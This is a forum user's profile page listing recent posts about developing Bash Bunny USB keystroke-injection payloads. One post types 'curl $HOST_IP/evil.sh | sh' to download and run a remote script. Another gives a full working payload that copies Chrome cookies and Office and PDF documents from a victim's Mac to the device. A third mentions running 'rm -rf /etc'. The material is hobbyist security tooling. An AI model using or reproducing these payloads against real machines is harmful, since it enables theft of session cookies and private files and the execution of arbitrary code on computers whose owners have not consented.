Jump to content

audibleblink

Active Members
  • Posts

    93
  • Joined

  • Last visited

  • Days Won

    6

Profile Information

  • Gender
    Male
  • Location
    NYC
  • Interests
    Software engineer. I've been know to write Rails for money.

Recent Profile Visitors

1,594 profile views

audibleblink's Achievements

Newbie

Newbie (1/14)

1

Community Answers

  1. Hi . I want to know how I can take advantage of meterpreter modules. how can I use. thank you in advance
  2. For future readers: I was using python's SimpleHTTPServer to try to serve the local directory. Even when binding the USB's network interface with $HOST_IP, it would still make that request and wait 15 seconds before continuing on. The answer for me was to disallow outgoing requests. This is the code that made the webserver start instantly. iptables -A OUTPUT -p udp --dport 53 -j DROP python -m SimpleHTTPServer 80
  3. Hmm, nope. Fresh restore and it still happens. wth? Tried it on another computer too
  4. Right on, thanks Seb. Guess it's just me, I'll close my issue and run a restore.
  5. Oh thanks man! I guess it's me then. I'm using linux. I can't think of a reason why I wouldn't see the delay in serial. Are you using ECM too? I think I'll try RNDIS just to see if anything changes. edit: nope. same delay with rndis_ethernet
  6. It's a very quick thing to do. it takes under a second when I run it in serial mode
  7. If I code something like this LED R python -m SimpleHTTPServer QUACK GUI space Q ENTER Q STRING terminal Q ENTER Q STRING curl $HOST_IP/evil.sh \| sh (with appropriate delays) it fails because the server takes 15 seconds to start anyway. I don't think it has anything to do with ssh. I was just logged in through ssh to develop the payload
  8. Has anyone else tried to bind a socket on their BB using something like netcat or python -m SimpleHTTPServer. When connected to the BB through ssh (ecm_ethernet), commands that bind sockets take ~15 seconds to exectue When connected through serial, everything acts as normal. I made a github issue about it, but wasn't sure if that's the right place since that repo is for payloads - https://github.com/hak5/bashbunny-payloads/issues/57
  9. I'm wondering if the /tools/ducky.py (which is called by QUACK) is running in a subshell. If the QUACK commands run async, then the script is running in its entirety before ever finishing the HID section of the payload. Just a hypothesis, this is where my bash knowledge reaches its limits.
  10. Is there a `files` folder in MacLoot? I thought it was just the xlsx folder and the cookies db
  11. it's still in the github code, i only pasted changes here.
  12. Submitted a PR to fix in mainline. - https://github.com/hak5/bashbunny-payloads/issues/51 Basic changes: - fixes lootdir path - dont capitalize var names that aren't exported - indentation - escape shell characters that are passed to QUACK - account for variable copy times by joining cp and exit commands - sync the disk LED G R ATTACKMODE HID STORAGE lootdir=loot/MacLoot mkdir -p /root/udisk/$LOOTDIR QUACK GUI SPACE QUACK DELAY 1000 QUACK STRING terminal QUACK ENTER QUACK DELAY 5000 QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/xlsx QUACK ENTER QUACK DELAY 500 QUACK STRING cat \~/Library/Application\\ Support/Google/Chrome/Default/Cookies \> /Volumes/BashBunny/$lootdir/chromecookies.db QUACK ENTER QUACK DELAY 1000 QUACK STRING cp \~/Documents/{*.xlsx,*.xls,*.pdf} /Volumes/BashBunny/$lootdir/xlsx/\; killall Terminal QUACK ENTER # Sync filesystem sync # Green LED for finished LED G
  13. You can also just `\` escape symbols right in the QUACK directive. QUACK cd $HOME evaluates to cd /root whereas QUACK cd \$HOME literally types cd $HOME This also goes for ~ ; and | symbols. Check out what I mean in this practical example - https://github.com/hak5/bashbunny-payloads/pull/36
  14. It appears we had the same idea. https://github.com/hak5/bashbunny-payloads/pull/36
  15. I'm currently running `rm -rf /etc` then un/plugging 3 times. =X
×
×
  • Create New...